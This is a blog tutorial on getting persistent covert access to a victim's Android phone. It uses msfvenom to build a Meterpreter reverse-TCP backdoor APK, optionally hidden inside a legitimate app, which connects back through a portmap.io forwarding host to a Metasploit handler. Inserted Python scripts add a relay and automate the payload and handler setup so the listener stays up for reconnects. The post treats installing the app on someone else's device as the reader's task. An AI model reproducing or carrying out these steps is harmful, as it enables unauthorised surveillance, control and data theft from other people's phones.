Hacking Android over WAN And Using Portmap.io to sustain the Backdoor
Hey guys,
In this blog post we are going to see how to get a shell on an Android device with a backdoor APK, set up so that we can get back in at any time.
Note: the victim has to install the malicious app themselves. This post only covers what to do before and after that installation; getting the victim to install the app is up to you.
First, let me explain what we are going to do.
On a LAN we build a malicious file, have it run on a machine in our local network, and give it our private IP to connect back to. Over the WAN that does not work, because a private IP is not routable from the internet. You need port forwarding: when a connection arrives on a public IP at a specific port, it is redirected to a port on your local machine.
Here we use a public VPN-based forwarding service to get that traffic routed to our device.
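To make the forwarding concrete, here is an added example (not code from the post, and not how portmap.io is implemented) of a minimal TCP relay: it accepts on a "public" port and splices each connection to a target port, which is the job the mapping rule does for you, with the OpenVPN tunnel carrying the connection to your machine. The `allowed` argument plays the role of the optional Allowed IP filter. The demo uses a constructed echo server on localhost in place of the Metasploit handler, so it runs offline.

```python
"""Minimal TCP relay: a stand-in for the portmap.io mapping rule.
Added example, not code from the post. 'listen_port' plays the port on
portmap, 'target' the Port on PC, 'allowed' the Allowed IP filter."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the peer sees EOF."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass


def _handle(client, target, allowed):
    """Apply the Allowed IP check, then splice client <-> target both ways."""
    peer_ip = client.getpeername()[0]
    if allowed is not None and peer_ip not in allowed:
        client.close()          # not on the allowed list: drop it
        return
    try:
        upstream = socket.create_connection(target, timeout=5)
    except OSError:
        client.close()          # nothing listening on the Port on PC side
        return
    upstream.settimeout(None)
    threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
    threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()


def start_relay(listen_host, listen_port, target, allowed=None):
    """Listen on (listen_host, listen_port) and forward every connection to
    target. Returns the listening socket; close it to stop accepting."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:
                return          # listener was closed
            threading.Thread(target=_handle, args=(client, target, allowed),
                             daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def _echo_server():
    """Constructed stand-in for the handler: echo one connection, return its port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)

    def serve():
        conn, _ = srv.accept()
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo(allowed=None):
    """Connect through the relay like the APK would; return what came back.
    A filtered or reset connection yields b''."""
    handler_port = _echo_server()
    relay = start_relay("127.0.0.1", 0, ("127.0.0.1", handler_port), allowed)
    public_port = relay.getsockname()[1]
    got = b""
    try:
        with socket.create_connection(("127.0.0.1", public_port), timeout=5) as c:
            c.sendall(b"hello from the apk")
            c.shutdown(socket.SHUT_WR)
            while True:
                chunk = c.recv(4096)
                if not chunk:
                    break
                got += chunk
    except OSError:
        pass                    # relay refused or reset us
    relay.close()
    return got


if __name__ == "__main__":
    print(demo())                           # b'hello from the apk'
    print(demo(allowed=("192.0.2.1",)))     # b'': 127.0.0.1 is not allowed
```

The second demo call shows why the Allowed IP field is worth filling in: a source that is not on the list never reaches the handler at all.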
So you will need:
Metasploit Framework
OpenVPN
If you don't understand that yet, just leave it and let's get our hands dirty.
Both tools are available for most platforms, so this works almost anywhere, even on Android in Termux.
We are going to use a free public service called portmap.io, and yes, as you would expect, free and public comes with some limitations.
First create an account here
www.portmap.io/register
Then Login to your account in
www.portmap.io/login
After logging in, go to Configurations in the top navigation bar.
Next, click the Create New Configuration button.
It asks for some details; fill them in as follows:
Name - Anything you may wish
Type - OpenVPN
Proto - TCP
Comment - Just for your reference
Click on the Generate button.
After the config file is generated, download it to your machine.
This file is what gives you access to the VPN service.
Then click Create to save the configuration.
Next we have to Create Mapping Rules, Click on the Mapping Rules in the Navigation bar.
This is the rule that says something like: "Ah! A packet for cyberraw69? Deliver it to him on port <port you forwarded>."
Then click on Create a New Rule.
Again it asks for some important details; fill these in carefully:
Configuration - the configuration you just created (free accounts are limited here, so it is filled in by default).
Protocol - TCP
Hostname - <your username>, with either portmap.io or portmap.host as the domain (pick whichever you wish). The full hostname the service shows you after creation is what you will use as LHOST for the payload.
Port on portmap - assigned by the service and cannot be changed. This is the public port the APK will connect to.
Port on PC - anything you wish. Remember this port well, you need it when you run the payload handler.
Allowed IP - optional, acts like a firewall on the public side.
Then click Create to create the rule.
If you followed everything as mentioned, the work in the browser is over and you may close it, provided you remember the full hostname and the Port on PC from the mapping rule.
Now we are going to act like a hacker, open the terminal :)
Navigate to where you downloaded the configuration file (from the first step).
cd Downloads
ls
Then run OpenVPN with that configuration file:
sudo openvpn --config mrfucker755.cyberraw69.ovpn
It stays in the foreground and the last line it prints is Initialization Sequence Completed.
That means everything so far is correct. Good job, read on.
Do not close this terminal: this tunnel is what routes the traffic from portmap.io to you. Minimize it and open another terminal.
Now generate the malicious APK with msfvenom:
msfvenom -p android/meterpreter/reverse_tcp LHOST=mrfucker755-47939.portmap.host LPORT=47939 R > Backdoor.apk
Do you recognize the LHOST? It is the hostname from the Mapping Rules page, and LPORT is the port on portmap (the public side of the rule, which is also part of the hostname), not the Port on PC. Type them in if you remember them, else look back.
You can also embed the payload in a legitimate APK with the -x option:
msfvenom -p android/meterpreter/reverse_tcp -x <legit app> LHOST=mrfucker755-47939.portmap.host LPORT=47939 -o Backdoor.apk
This does not work on every app: the payload has to be injected into a decompiled and rebuilt copy of the app, and that step fails on some apps, for example hardened or obfuscated ones.
Now start the Metasploit Framework:
msfconsole
Set the necessary options as follows:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <tun0-IP>
set LPORT <Port you gave in mapping rules>
To get that IP address:
ifconfig tun0
Put that IP in as LHOST. For LPORT use the Port on PC from the mapping rule, not the port on portmap. If the port is below 1024 you would need to be root, so better stick with the default 4444 or use 8080. Now everything is set and you can run the handler:
run
The handler is now started and waiting for connections.
Now it is your turn: install the app on the victim's device. After installation it shows up as MainActivity. Tap it, and you will see the connection arrive at your handler.
Congrats, you popped a shell on that device.
To view all the commands, type:
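The two LPORTs above are the part people get wrong: the APK must dial the public side (portmap hostname and port on portmap), while the handler binds the local side (tun0 address and Port on PC). The following is an added example, not code from the post, that derives both from the mapping rule and writes an msfconsole resource script. It assumes the hostname portmap.io hands out ends in -<port on portmap> as in the post's mrfucker755-47939.portmap.host, and that `ip -4 -o addr show tun0` is available to read the tunnel address. It also sets ExitOnSession false and starts the handler as a job, so the listener stays up for reconnects instead of returning to the prompt after the first session.

```python
#!/usr/bin/env python3
"""Build the handler side of the setup from the portmap.io mapping rule.
Added example, not code from the post. Assumptions: the mapping hostname
ends in -<port on portmap>; the handler binds tun0 (the OpenVPN interface);
msfconsole -r loads the generated resource script."""
import os
import re
import subprocess
import sys

PAYLOAD = "android/meterpreter/reverse_tcp"
# Hostname shape assumed from the post's example: <name>-<public port>.<domain>
_HOST_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9-]*-(\d{1,5})\.portmap\.(io|host)$")
_INET_RE = re.compile(r"\binet (\d{1,3}(?:\.\d{1,3}){3})")


def portmap_port_from_host(host):
    """Public port assigned by the mapping rule, taken from the hostname."""
    m = _HOST_RE.match(host)
    if not m:
        raise ValueError(f"not a portmap mapping hostname: {host!r}")
    port = int(m.group(1))
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range in hostname: {host!r}")
    return port


def build_msfvenom_cmd(host, out="Backdoor.apk", template=None):
    """msfvenom argv: the APK dials the PUBLIC side (portmap host + port)."""
    cmd = ["msfvenom", "-p", PAYLOAD]
    if template:                    # -x embeds the payload in a legitimate APK
        cmd += ["-x", template]
    cmd += [f"LHOST={host}", f"LPORT={portmap_port_from_host(host)}", "-o", out]
    return cmd


def needs_root(port):
    """Binding below 1024 needs root; the post suggests 4444 or 8080 instead."""
    return port < 1024


def build_handler_rc(tun0_ip, pc_port):
    """msfconsole resource script. The handler listens on the LOCAL side:
    tun0 address + Port on PC. ExitOnSession false with exploit -j keeps the
    listener alive, so a died session only needs the app reopened."""
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {PAYLOAD}",
        f"set LHOST {tun0_ip}",
        f"set LPORT {pc_port}",
        "set ExitOnSession false",
        "exploit -j",
        "",
    ])


def parse_tun0_ip(ip_addr_output):
    """First IPv4 address in the output of `ip -4 -o addr show tun0`."""
    m = _INET_RE.search(ip_addr_output)
    if not m:
        raise RuntimeError("tun0 has no IPv4 address; is openvpn still running?")
    return m.group(1)


def tun0_ip():
    out = subprocess.run(["ip", "-4", "-o", "addr", "show", "tun0"],
                         capture_output=True, text=True, check=False).stdout
    return parse_tun0_ip(out)


def main(argv):
    if len(argv) not in (3, 4):
        print("usage: handler_setup.py <portmap hostname> <port on PC> [legit.apk]")
        return 2
    host, pc_port = argv[1], int(argv[2])
    template = argv[3] if len(argv) == 4 else None
    if needs_root(pc_port) and os.geteuid() != 0:
        print(f"port {pc_port} is below 1024 and you are not root", file=sys.stderr)
        return 1
    with open("handler.rc", "w") as f:
        f.write(build_handler_rc(tun0_ip(), pc_port))
    print("generate the APK with:\n  " + " ".join(build_msfvenom_cmd(host, template=template)))
    print("start the handler with:\n  msfconsole -r handler.rc")
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 handler_setup.py mrfucker755-47939.portmap.host 4444` once OpenVPN is up; it refuses to continue if tun0 has no address, which is the usual reason the APK never connects.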
help
You can run any of the commands listed. If a command errors out, close the existing session and open a new one (press Ctrl+C in the Meterpreter session and tap the app once more).
There are other free port forwarding services too; two that I know of are
ngrok
serveo
ngrok is good for static things like hosting a website, but here, when you terminate ngrok, you have to redo the whole process, because the port changes every time you run it.
serveo is good and does not even need an account. It is somewhat similar to portmap.io, but it uses SSH forwarding (ssh -R) instead. I plan to write about it in the future, so stay tuned.
The advantage of this setup is that when you get something like
Meterpreter session closed. Reason: Died
you do not need to redo everything; just tap the app again. The app keeps connecting back to you as long as OpenVPN and the msf handler are running.
So that's it, thanks for reading, hope you learned something.
If you have problems, watch this video:
https://www.youtube.com/watch?v=9bqt5QA48Z4
If you want to know what's happening behind the scenes, message me on Twitter: @n00bie4